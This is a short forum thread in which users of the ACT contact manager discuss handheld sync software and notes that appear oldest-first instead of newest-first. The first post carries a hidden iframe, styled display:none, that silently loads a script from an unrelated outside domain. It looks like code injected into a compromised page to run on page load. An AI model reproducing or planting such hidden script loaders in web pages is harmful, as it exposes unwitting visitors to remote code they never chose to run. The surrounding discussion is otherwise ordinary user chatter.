anybody use ACT contact manger.....syncing but my notes are not in proper order...ie...latest notes first...otheway around..shows the most dated first....otherwise syncing fine....any comments...use puma ? sync software......<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I use ACT 2000 (with update from Interact Commerce), and use the Act Link 2. I have noticed that the notes are out of order as well, but it doesn't bother me.

Over the years, I have tried Companionlink, Puma Intellisync and some others, and have always come back to this.

I certainly would love to hear of others out there, but I think ACT's! is the best....

love ACT as well....tried outlook not happy w.....notes a big issue..re...clients ..etc...most currents notes would be helpful when visiting clients to see what was done recently....add notes everytime i s/w .....have had no probs w/ puma ....have you tried to play w/ so notes are in order.....thanks...msw
